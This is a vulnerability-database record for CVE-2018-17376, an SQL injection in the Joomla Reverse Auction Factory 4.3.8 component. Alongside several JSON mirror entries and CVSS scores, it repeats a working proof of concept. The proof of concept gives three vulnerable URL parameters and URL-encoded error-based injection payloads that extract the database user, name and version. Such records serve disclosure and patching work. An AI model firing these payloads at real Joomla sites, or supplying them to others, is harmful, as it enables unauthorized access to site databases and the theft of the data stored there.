ID PACKETSTORM:149531
Type packetstorm
Reporter Ihsan Sencan
Modified 2018-09-25T00:00:00
Description
`# # # # #
# Exploit Title: Joomla! Component Reverse Auction Factory 4.3.8 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/reverse-auction-factory/
# Version: 4.3.8
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17376
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC:
#
# 1)
# http://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&filter_order_Dir=[SQL]
#
# %2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29
#
# 2)
# http://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&cat=[SQL]
#
# %31%27%20%61%6e%64%28%73%65%6c%65%63%74%20%31%20%46%52%4f%4d%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%2c%63%6f%6e%63%61%74%28%28%73%65%6c%65%63%74%20%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%64%61%74%61%62%61%73%65%28%29%2c%30%78%32%37%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%4c%49%4d%49%54%20%30%2c%31%29%2c%66%6c%6f%6f%72%28%72%61%6e%64%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%2d
#
# 3)
# http://localhost/[PATH]/index.php?option=com_rbids&task=categories&filter_letter=[SQL]
#
# %27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58
#
# # # #
`
{"id": "PACKETSTORM:149531", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Joomla! Reverse Auction Factory 4.3.8 SQL Injection", "description": "", "published": "2018-09-25T00:00:00", "modified": "2018-09-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/149531/Joomla-Reverse-Auction-Factory-4.3.8-SQL-Injection.html", "reporter": "Ihsan Sencan", "references": [], "cvelist": ["CVE-2018-17376"], "lastseen": "2018-09-26T02:08:42", "viewCount": 13, "enchantments": {"score": {"value": 4.9, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-17376"]}, {"type": "exploitdb", "idList": ["EDB-ID:45475"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DCD6CE9612132D2506600B73AD364301"]}, {"type": "zdt", "idList": ["1337DAY-ID-31182"]}], "rev": 4}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2018-17376"]}, {"type": "exploitdb", "idList": ["EDB-ID:45475"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DCD6CE9612132D2506600B73AD364301"]}, {"type": "zdt", "idList": ["1337DAY-ID-31182"]}]}, "exploitation": null, "vulnersScore": 4.9}, "sourceHref": "https://packetstormsecurity.com/files/download/149531/joomlaraf438-sql.txt", "sourceData": "`# # # # # \n# Exploit Title: Joomla! Component Reverse Auction Factory 4.3.8 - SQL Injection \n# Dork: N/A \n# Date: 2018-09-24 \n# Vendor Homepage: https://thephpfactory.com/ \n# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/reverse-auction-factory/ \n# Version: 4.3.8 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: CVE-2018-17376 \n# # # # # \n# Exploit Author: Ihsan Sencan \n# # # # # \n# POC: \n# \n# 1) \n# http://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&filter_order_Dir=[SQL] \n# \n# %2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29 \n# \n# 2) \n# http://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&cat=[SQL] \n# \n# %31%27%20%61%6e%64%28%73%65%6c%65%63%74%20%31%20%46%52%4f%4d%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%2c%63%6f%6e%63%61%74%28%28%73%65%6c%65%63%74%20%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%64%61%74%61%62%61%73%65%28%29%2c%30%78%32%37%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%4c%49%4d%49%54%20%30%2c%31%29%2c%66%6c%6f%6f%72%28%72%61%6e%64%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%2d \n# \n# 3) \n# http://localhost/[PATH]/index.php?option=com_rbids&task=categories&filter_letter=[SQL] \n# \n# %27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 \n# \n# # # # \n \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645327975}}
{"exploitpack": [{"lastseen": "2020-04-01T19:04:23", "description": "\nJoomla! Component Reverse Auction Factory 4.3.8 - SQL Injection", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-09-25T00:00:00", "title": "Joomla! Component Reverse Auction Factory 4.3.8 - SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17376"], "modified": "2018-09-25T00:00:00", "id": "EXPLOITPACK:DCD6CE9612132D2506600B73AD364301", "href": "", "sourceData": "# # # # #\n# Exploit Title: Joomla! Component Reverse Auction Factory 4.3.8 - SQL Injection\n# Dork: N/A\n# Date: 2018-09-24\n# Vendor Homepage: https://thephpfactory.com/\n# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/reverse-auction-factory/\n# Version: 4.3.8\n# Category: Webapps\n# Tested on: WiN7_x64/KaLiLinuX_x64\n# CVE: CVE-2018-17376\n# # # # #\n# Exploit Author: Ihsan Sencan\n# # # # #\n# POC: \n# \n# 1)\n# http://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&filter_order_Dir=[SQL]\n# \n# %2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29\n# \n# 2)\n# http://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&cat=[SQL]\n# \n# %31%27%20%61%6e%64%28%73%65%6c%65%63%74%20%31%20%46%52%4f%4d%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%2c%63%6f%6e%63%61%74%28%28%73%65%6c%65%63%74%20%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%64%61%74%61%62%61%73%65%28%29%2c%30%78%32%37%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%4c%49%4d%49%54%20%30%2c%31%29%2c%66%6c%6f%6f%72%28%72%61%6e%64%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%2d\n# \n# 3)\n# http://localhost/[PATH]/index.php?option=com_rbids&task=categories&filter_letter=[SQL]\n# \n# %27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58\n# \n# # # #", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-09-25T22:12:46", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-09-25T00:00:00", "type": "zdt", "title": "Joomla Reverse Auction Factory 4.3.8 Component - SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-17376"], "modified": "2018-09-25T00:00:00", "id": "1337DAY-ID-31182", "href": "https://0day.today/exploit/description/31182", "sourceData": "# # # # #\r\n# Exploit Title: Joomla! Component Reverse Auction Factory 4.3.8 - SQL Injection\r\n# Vendor Homepage: https://thephpfactory.com/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/reverse-auction-factory/\r\n# Version: 4.3.8\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-17376\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# # # # #\r\n# POC: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&filter_order_Dir=[SQL]\r\n# \r\n# %2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29\r\n# \r\n# 2)\r\n# http://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&cat=[SQL]\r\n# \r\n# %31%27%20%61%6e%64%28%73%65%6c%65%63%74%20%31%20%46%52%4f%4d%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%2c%63%6f%6e%63%61%74%28%28%73%65%6c%65%63%74%20%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%64%61%74%61%62%61%73%65%28%29%2c%30%78%32%37%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%4c%49%4d%49%54%20%30%2c%31%29%2c%66%6c%6f%6f%72%28%72%61%6e%64%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%2d\r\n# \r\n# 3)\r\n# http://localhost/[PATH]/index.php?option=com_rbids&task=categories&filter_letter=[SQL]\r\n# \r\n# %27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58\r\n# \r\n# # # #\n\n# 0day.today [2018-09-25] #", "sourceHref": "https://0day.today/exploit/31182", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T14:35:10", "description": "SQL Injection exists in the Reverse Auction Factory 4.3.8 component for Joomla! via the filter_order_Dir, cat, or filter_letter parameter.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-28T00:29:00", "type": "cve", "title": "CVE-2018-17376", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-17376"], "modified": "2018-11-14T21:30:00", "cpe": ["cpe:/a:thephpfactory:reverse_auction_factory:4.3.8"], "id": "CVE-2018-17376", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17376", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:thephpfactory:reverse_auction_factory:4.3.8:*:*:*:*:joomla\\!:*:*"]}], "exploitdb": [{"lastseen": "2022-05-04T17:29:52", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-25T00:00:00", "type": "exploitdb", "title": "Joomla! Component Reverse Auction Factory 4.3.8 - SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2018-17376", "CVE-2018-17376"], "modified": "2018-09-25T00:00:00", "id": "EDB-ID:45475", "href": "https://www.exploit-db.com/exploits/45475", "sourceData": "# # # # #\r\n# Exploit Title: Joomla! Component Reverse Auction Factory 4.3.8 - SQL Injection\r\n# Dork: N/A\r\n# Date: 2018-09-24\r\n# Vendor Homepage: https://thephpfactory.com/\r\n# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/auction/reverse-auction-factory/\r\n# Version: 4.3.8\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-17376\r\n# # # # #\r\n# Exploit Author: Ihsan Sencan\r\n# # # # #\r\n# POC: \r\n# \r\n# 1)\r\n# http://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&filter_order_Dir=[SQL]\r\n# \r\n# %2c%45%58%54%52%41%43%54%56%41%4c%55%45%28%36%36%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%29%29\r\n# \r\n# 2)\r\n# http://localhost/[PATH]/index.php?option=com_rbids&task=listauctions&cat=[SQL]\r\n# \r\n# %31%27%20%61%6e%64%28%73%65%6c%65%63%74%20%31%20%46%52%4f%4d%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%2c%63%6f%6e%63%61%74%28%28%73%65%6c%65%63%74%20%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%64%61%74%61%62%61%73%65%28%29%2c%30%78%32%37%2c%30%78%37%65%29%29%20%46%52%4f%4d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%4c%49%4d%49%54%20%30%2c%31%29%2c%66%6c%6f%6f%72%28%72%61%6e%64%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%2d\r\n# \r\n# 3)\r\n# http://localhost/[PATH]/index.php?option=com_rbids&task=categories&filter_letter=[SQL]\r\n# \r\n# %27%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32%2c%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58\r\n# \r\n# # # #", "sourceHref": "https://www.exploit-db.com/download/45475", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
